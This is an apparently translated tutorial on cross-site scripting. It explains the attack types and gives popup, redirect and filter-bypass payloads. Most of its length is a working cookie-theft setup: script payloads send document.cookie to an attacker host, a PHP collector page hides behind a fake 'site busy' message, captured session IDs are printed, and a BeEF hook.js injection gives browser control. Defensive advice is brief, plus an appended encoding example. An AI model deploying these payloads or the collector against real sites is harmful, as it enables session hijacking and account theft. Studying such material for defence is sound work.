Disclaimer: All documents are intended for security testing to enhance protection; use them at your own risk.

What is an XSS attack?

XSS means that a malicious attacker takes advantage of a website's failure to escape or filter the data users submit, adds malicious code, and embeds it in a web page, so that the code executes whenever any other user visits the page. The aim is to steal user information, perform actions under the user's identity, or deliver malware to visitors.

Unlike most other attack methods, which target the server, XSS attacks the client and thereby indirectly harms the interests of the company or its users. Normally an XSS attack is delivered through the page and has no direct effect on the server, but when users browse the page their interests are directly or indirectly damaged.

XSS attack principle:

The principle of an XSS attack is that the website does not escape the data users submit, or does not filter it sufficiently. A malicious attacker exploits this to embed code such as JavaScript, Java, VBScript, ActiveX, Flash or HTML in the web page, so that other users who access the page execute the embedded code. As a result, user information is leaked, endangering the assets of both the company and its users.

What do users usually do directly with XSS attacks?

Most commonly, XSS is used to steal users' accounts directly, to force the sending of emails, to plant malware (trojans) on websites, and to control the victim's machine in order to launch further attacks. Attackers usually then use the stolen account information for other, more aggressive or more profitable illegal activities.

[XSS attack diagram]

Note: the diagram describes only one type of attack; there are other types. Besides simulating a user login, an attacker can also manipulate user A's browser while it is online.

Classification of common XSS attacks

  1. Reflected XSS attack

    A form that satisfies all of the following criteria can be considered exposed to a reflected XSS attack.

    • The form is submitted via GET.
    • The front end does not restrict special characters before submitting.
    • The back end does not check the validity or harmfulness of the submitted content.
    • An XSS attack URL can be generated.
  2. Stored XSS attack (also known as persistent XSS; it does the most damage)

    • The front end does not restrict special characters before submitting.
    • The back end does not check the validity or harmfulness of the submitted content.
    • The submitted content is stored on the server intact and unescaped, and is then displayed on the page.
  3. DOM-based XSS attack

Various tags in XSS scripts

  1. HTML tags commonly used in XSS attacks.
    <iframe>    Creates an inline frame that contains another document (commonly known as an inline frame).
    <textarea>  Defines a multi-line text input control.
    <img>       Inserts an image into the web page.
    <script>    Defines a client-side script.
  2. JavaScript properties and event handlers commonly used in XSS attacks.
    window.location   Gets the URL of the current page; assigning to it redirects the browser to a new page.
    location.href     Returns the full URL of the currently displayed document.
    onload            Fires when a page or image has finished loading.
    onsubmit          Fires when the submit button is clicked.
    onerror           Fires when an error occurs while loading the document or image.
  • Note: this document covers only a few XSS attack scripts; if you want to know more attack scripts, please Google them. I don't like the Putian system.

Manually test pages to see if they contain vulnerabilities threatened by XSS attacks

  1. Popup warning test
  • If this popup warning test passes, the page has an XSS vulnerability.
    JavaScript popup warning:
    <script>alert('1')</script>
  2. Other XSS tests
    JavaScript page redirection:
    <script>window.location="http://www.baidu.com"</script>
    HTML page nesting:
    <iframe src="http://www.baidu.com"></iframe>

Manual test attacks bypass detection methods

  1. Use other tags to hide the payload
    <img src="#" onerror=alert(/1/)>
    <img src="http://.... js"></img>
  2. Use mixed case to bypass validation
    <ScRIpT>alert('1')</ScRIpT>
  3. Use URL or base64 character encoding
    <a href="aHR0cHMlM0EvL3d3dy5iYWlkdS5jb20=">test</a>

Collecting User cookies

Do not use this for illegal purposes; if you do, you bear the consequences!

Using different tags can make the WAF less sensitive to the payload.

1. <script>window.open("http://url?cookie="+document.cookie)</script>
2. <script>document.location.href="http://url?cookie="+document.cookie</script>
3. <script>new Image().src="http://url?cookie="+document.cookie</script>

Cookie collection attacks with stored XSS threats

  • Prepare a web server to collect the cookies of users affected by the XSS.
lqh@lqh:~$ kvmclone collection_of_cookie
Formatting '/var/lib/libvirt/images/collection_of_cookie.qcow2', fmt=qcow2 size=32212254720 backing_file=/var/lib/libvirt/images/.back.qcow2 cluster_size=65536 lazy_refcounts=off refcount_bits=16
Domain collection_of_cookie defined from /etc/libvirt/qemu/collection_of_cookie.xml

VM collection_of_cookie Create
#Clone a server from the backing disk to serve as the cookie collection machine.

lqh@lqh:~$ virsh start collection_of_cookie
Domain collection_of_cookie started
#Start the cookie collection server

lqh@lqh:~$ virsh console collection_of_cookie
#Connect to the console
[root@localhost ~]# setnet.py 0 192.168.1.51
#Set the server IP through the script defined on your own backing disk
[root@localhost ~]# exit
logout
lqh@lqh:~$ ssh root@192.168.1.51
Warning: Permanently added '192.168.1.51' (ECDSA) to the list of known hosts.
Last login: Sun Feb 2 13:08:06 2020
Virtual host...
#Log in to the server remotely

[root@localhost ~]# hostnamectl set-hostname cookieServer
#Setting the host Name
[root@localhost ~]# yum install -y php httpd
#Install the HTTPD and PHP environment; the cookie collector on my side is written in PHP

[root@localhost ~]# vim /var/www/html/get_c.php
<?php
echo "Sorry, the site is busy, please try again later!";
$cookie = $_GET['cookie'];                          // Cookie value passed in the query string
$cookie_log = fopen("/log/cookie_log.log", "a");   // Log file path: /log
fwrite($cookie_log, $cookie . "\n");               // Write the cookie to the stream, one per line
fclose($cookie_log);                               // Close the stream
?>
#Write a PHP page to collect cookies from users (and, as is customary, proclaim PHP the best language in the world)

[root@localhost ~]# mkdir /log
[root@localhost /]# chown apache:apache /log/
#Create the /log directory and set its owner to apache

[root@localhost ~]# systemctl start httpd
#Start the HTTPD service
[root@localhost httpd]# curl localhost/get_c.php
#Test whether the setup is successful
  • Build the XSS code and place it on a web page.
    <script>document.location.href="http://192.168.1.51/get_c.php?cookie="+document.cookie</script>
  • If the input field has a length limit, we use the browser's developer tools to remove it.

  • Wait for a user to trigger the XSS code, which submits their cookie to the server prepared earlier.

[root@localhost httpd]# tail -f /log/cookie_log.log
security=low; PHPSESSID=ebe8mv0bmj3f7lmht979g3ssq2
security=low; PHPSESSID=tckdm41rl64a4h33jakdo54mv2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
security=low; PHPSESSID=tckdm41rl64a4h33jakdo54mv2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
  • Make use of the collected cookies.

Automated XSS threat testing

  • Use the powerful open-source BeEF penetration testing framework, which exploits XSS vulnerabilities with a JS hook script and integrates with Metasploit.

  • Install BeEF

root@lqh:/home/lqh# sudo apt-add-repository -y ppa:brightbox/ruby-ng
#Add a Ruby repository; a Ruby environment is required

root@lqh:/home/lqh# apt-get install ruby -y
#Installing the Ruby Environment

root@lqh:/home/lqh# gem install bundler
#Install the bundler

root@lqh:/home/lqh# sudo apt-add-repository -y ppa:rael-gc/rvm
#Add the RVM repository

root@lqh:/home/lqh# sudo apt-get install rvm -y
#Install RVM

root@lqh:/home/lqh# git clone https://gitee.com/lai_qinghua_admin/beef.git
#Cloning from Gitee is fast, so you can use my public mirror

root@lqh:/home/lqh# cd beef
root@lqh:/home/lqh#  ./install
#Start the installation

#Here I need to change the RubyGems default source to Aliyun

root@lqh:/# gem sources
#View the default source

root@lqh:/# gem sources --remove
#Remove the default source returned by the previous command

root@lqh:/# gem sources -a https://mirrors.aliyun.com/rubygems/
#Add the Aliyun source

root@lqh:/# gem update --system
#Start the upgrade; it's very fast

#Go back to the BeEF folder and run the installation script, and it won't get stuck.
Latest version already installed. Done.
[INFO]  Detecting bundler gem...
[INFO]  bundler gem is installed
Installing required Ruby gems...
#Looks like the RubyGems version is too high.

#There is also the problem that the installation script cannot be run as root
[DEPRECATED] The `--without` flag is deprecated because it relies on being remembered across bundler invocations, which bundler will no longer do in future versions. Instead please use `bundle config set without 'test development'`, and stop using this flag
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root will break this
application for all non-root users on this machine.

#An error was reported because I upgraded to the latest version ("the ConfigMap method is deprecated"), so I have to downgrade RubyGems again
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:30: warning: constant Gem::ConfigMap is deprecated

#The GitHub maintainers haven't solved this problem yet and I can't work it out myself, so sorry, I've decided to switch to Kali
  • After BeEF starts, it listens on port 3000 on all network interfaces, and we can open the interface it provides directly in a browser at /ui/panel

  • It provides our XSS attack code at /hook.js

  • At the injection point identified earlier, inject <script src="http://192.168.122.148:3000/hook.js"></script>

  • As long as the browser does not go offline, BeEF can control it and do all kinds of things.

---------------------------------------- BeEF attack operations omitted here ----------------------------------------

Defensive skills

  • Convert submitted content into HTML entities so that the browser cannot parse it as HTML elements.

  • Do not allow special characters in submitted user input.
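An added example (not code from the original post) that puts the entity-conversion defence above beside the bypass tricks from the manual-testing section: a naive blacklist that strips only a lowercase <script> tag is defeated by the mixed-case, <img onerror> and <iframe> probes quoted earlier, while converting the characters HTML gives meaning to into entities neutralises all of them. The probe strings are constructed test input taken from this post; naiveFilter, escapeHtml, looksLikeMarkup and evaluate are names chosen here.

```javascript
// Added example, not code from the original post. Compares a blacklist filter
// with HTML entity encoding using the probe strings quoted in the post.

// Naive blacklist: strips only a lowercase <script>...</script> pair.
function naiveFilter(input) {
  return input.replace(/<script>.*?<\/script>/g, "");
}

// Entity encoding: each character HTML assigns meaning to becomes an entity,
// so the browser shows the text literally instead of parsing it as markup.
const ENTITY_MAP = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (ch) => ENTITY_MAP[ch]);
}

// Rough check used only for this demonstration: does the string still contain
// a '<' followed by a letter, i.e. something a browser would treat as a tag?
function looksLikeMarkup(s) {
  return /<[a-zA-Z]/.test(s);
}

// Constructed test input: the probe strings shown earlier in the post.
const PROBES = [
  "<script>alert('1')</script>",                     // popup test
  "<ScRIpT>alert('1')</ScRIpT>",                     // mixed-case bypass
  '<img src="#" onerror=alert(/1/)>',                // event handler on another tag
  '<iframe src="http://www.baidu.com"></iframe>',    // page nesting
];

// Runs each probe through a sanitiser and reports whether markup survives.
function evaluate(sanitise) {
  return PROBES.map((p) => looksLikeMarkup(sanitise(p)));
}

// Stand-alone demonstration. In the browser the same rule applies to DOM-based
// XSS: write untrusted data with textContent, never with innerHTML.
console.log("blacklist leaves markup:", evaluate(naiveFilter));      // [false, true, true, true]
console.log("entity encoding leaves markup:", evaluate(escapeHtml)); // [false, false, false, false]
```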